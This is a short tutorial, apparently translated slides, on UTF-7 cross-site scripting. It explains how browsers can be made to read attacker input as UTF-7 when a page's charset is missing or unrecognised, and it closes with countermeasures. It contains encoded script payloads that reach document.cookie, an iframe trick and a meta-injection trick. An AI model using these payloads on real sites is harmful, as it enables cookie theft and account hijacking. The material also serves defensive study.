What is UTF-7?
- A kind of encoding method of Unicode.
- Express all Unicode characters by ASCII letters only.
- Part of symbols are also encoded.
Part of symbols are also encoded.
<div>ABCDE</div>
+ADw-div+AD4-ABCDE+ADw-/div+AD4-
WritingHTML with UTF-7
<html>
<body>
<div>ABCD</div>
</body>
</html>
+ADw-html+AD4-
+ADw-body+AD4-
+ADw-div+AD4-ABCD+ADw-/div+AD4-
+ADw-/body+AD4-
+ADw-/html+AD4-
<input type="text"value="ABCD">
+ADw-inputtype+ADOAIg-text+ACI- value+ADOAIg-ABCD+ACIAPg-
Targetof attack
Application that a charset is vague is attacked.
Encourage to detect as UTF-7 to browser.
charset is vague
- HTTP response header
- <meta http-equiv>
When there is no specification of charset in both, attacker makesa browser judge that is UTF-7.
- No charset is specified in HTTP response headers.
HTTP/1.1 200 OK
Content-Type: text/html
....
<html><body>...</body></html>
- No charset is specified in <meta>.
<head>
<meta http-equiv="content-type"content="text/html">
</head>
How toattack
Techniques for recognize as UTF-7
- Auto Selecting Encoding
- via iframe of UTF-7
- unidentifiable charset
Auto Selecting Encoding
When there is a string seems utf-7 and not charset isspecified,UTF-7 is selected automatically.
Recognize as UTF-7 and running the script.
<div>
+ADw-script+AD4-
alert( document.cookie );
+ADw-/script+AD4-
</div>
via iframe of UTF-7
When Janapese text is contained, UTF-7 is not selected byAuto-selecting. Selecting UTF-7 is forced by calling from iframewhich is UTF-7.
<meta http-equiv='content-type'content='text/html;charset=UTF-8'>
...
<iframesrc="target.html"></iframe>
Unidentifiable charset
Unrecognizable charset-name by browser is equal to unspecified.
Typical wrong charset names are:
- Windows-31J/CP932/MS932/MS942C/sjis/jis/utf8
<meta http-equiv='content-type'content='text/html;charset=Windows-31J'>
+ADw-script+AD4-alert(document.cookie);+ADw-/script+AD4-
Insert strings before <meta>
<title>+ADw-/title+AD4-
+ADw-metahttp-equiv+AD0-'content-type'
content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-
</title><meta http-equiv='content-type'content='text/html;charset=euc-jp'>
Countermeasure
- Specify charset clearly(HTTP header is recommended)
- Don't place the text attacker can control before <meta>
推薦閱讀:
http://openmya.hacker.jp/hasegawa/public/20071107/s6/h6.html?file=datae.txt
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
![Pikachu靶機系列之XSS(Cross-Site Scripting)[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)